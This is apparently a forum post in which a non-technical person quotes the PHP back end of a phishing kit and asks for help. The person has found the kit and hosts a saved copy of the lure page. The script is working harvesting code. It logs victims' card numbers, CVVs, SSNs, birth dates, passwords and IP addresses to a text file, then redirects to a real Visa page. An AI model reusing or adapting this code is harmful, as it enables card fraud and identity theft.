I am sorry, I’m not too tech savy; here is the code from the sender.php script:
[php]<?php
session_start();
$card = $_POST[‘card’];
$expm = $_POST[‘expm’];
$expy = $_POST[‘expy’];
$cvv = $_POST[‘cvv’];
$ssn = $_POST[‘ssn’];
$zip = $_POST[‘zip’];
$a = $_POST[‘a’];
$b = $_POST[‘b’];
$c = $_POST[‘c’];
$sec = $_POST[‘sec’];
$sec2 = $_POST[‘sec2’];
{
$ip = getenv(“REMOTE_ADDR”);
$file = fopen(“ca.txt”, “a”);
$ip = getenv(“REMOTE_ADDR”);
$adddate = date(“D M d, Y g:i a”);
fputs ($file, “$adddate\r\n”);
fputs ($file, “Card: $card\r\n”);
fputs ($file, “Expm: $expm\r\n”);
fputs ($file, “Expy: $expy\r\n”);
fputs ($file, “CCV: $cvv\r\n”);
fputs ($file, “SSN: $ssn\r\n”);
fputs ($file, “(Zip): $zip\r\n”);
fputs ($file, “DD: $a\r\n”);
fputs ($file, “MM: $b\r\n”);
fputs ($file, “Year: $c\r\n”);
fputs ($file, “Passwd: $sec\r\n”);
fputs ($file, “Passwdc: $sec2\r\n”);
fputs ($file, “$ip\r\n”);
fputs ($file, “---------\r\n”);
fclose ($file);}
header(“Location: http://www.visaeurope.com/en/visa_europe.aspx”);
?>[/php]
So what are my options?! Like I said I am not too PHP savy and the guy who wrote this is no longer available.
I have uploaded the link the spammer is emailing the people: http://fdv.recovery-experts.com/Login_Jok2j3.html (this isnt an actual link, this is a saved html file that someone emailed me and I uploaded to my server)